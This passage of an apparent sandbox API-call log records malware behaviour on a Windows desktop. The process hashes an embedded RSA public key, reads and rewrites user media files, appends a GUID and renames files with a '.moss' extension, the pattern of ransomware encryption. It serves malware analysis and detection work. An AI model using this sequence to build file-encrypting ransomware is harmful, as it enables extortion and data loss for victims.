KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.418] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.419] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.419] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.419] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.419] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.420] GetLastError () returned 0x0 [0169.420] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.420] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.420] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.420] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.420] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.420] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.420] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.420] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.420] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b506a8 [0169.420] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe58 | out: hHeap=0xcd0000) returned 1 [0169.420] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe70 | out: hHeap=0xcd0000) returned 1 [0169.420] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.420] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.420] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b506a8 | out: hHeap=0xcd0000) returned 1 [0169.420] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe70 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbe58 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.421] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.421] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe70 | out: hHeap=0xcd0000) returned 1 [0169.421] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.421] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe58 | out: hHeap=0xcd0000) returned 1 [0169.421] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.421] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.421] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.421] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.421] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.421] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.421] GetCurrentThreadId () returned 0x324 [0169.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd321b0 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.422] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.422] GetCurrentThreadId () returned 0x324 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.422] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.422] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.422] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.422] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.422] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.423] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe58 [0169.423] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.423] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe70 [0169.423] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.424] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.424] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe40 [0169.424] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.424] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0169.424] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.424] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0169.424] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.424] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.424] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.424] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.424] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.424] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe88 [0169.424] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.424] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.425] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7e84, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.425] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.425] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.425] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.425] CloseHandle (hObject=0x664) returned 1 [0169.426] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.426] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b48820 [0169.427] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qrpy3cG52AHZ_9BZ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qrpy3cg52ahz_9bz.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qrpy3cG52AHZ_9BZ.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qrpy3cg52ahz_9bz.m4a.moss")) returned 1 [0169.429] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63838ab0, ftCreationTime.dwHighDateTime=0x1d5d8ab, ftLastAccessTime.dwLowDateTime=0xcdfd0b60, ftLastAccessTime.dwHighDateTime=0x1d5e7b4, ftLastWriteTime.dwLowDateTime=0xcdfd0b60, ftLastWriteTime.dwHighDateTime=0x1d5e7b4, nFileSizeHigh=0x0, nFileSizeLow=0x9216, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RaJMjJJ.flv", cAlternateFileName="")) returned 1 [0169.429] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.429] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0169.430] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RaJMjJJ.flv") returned=".flv" [0169.430] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RaJMjJJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rajmjjj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.430] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=37398) returned 1 [0169.430] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.435] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x91f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.435] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.437] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.437] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x9216, lpOverlapped=0x0) returned 1 [0169.437] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.437] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.437] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.437] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.439] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.439] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.439] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.439] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.440] GetLastError () returned 0x0 [0169.440] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.440] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.440] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.440] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.440] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9220) returned 0x3b48820 [0169.440] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b51a48 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45548 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe28 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45590 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe40 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe70 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe88 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.441] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b447b0 [0169.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe70 | out: hHeap=0xcd0000) returned 1 [0169.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe88 | out: hHeap=0xcd0000) returned 1 [0169.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0169.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe88 [0169.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbe70 [0169.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe88 | out: hHeap=0xcd0000) returned 1 [0169.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe70 | out: hHeap=0xcd0000) returned 1 [0169.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.443] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.443] GetCurrentThreadId () returned 0x324 [0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd32240 [0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.443] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.443] GetCurrentThreadId () returned 0x324 [0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.443] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 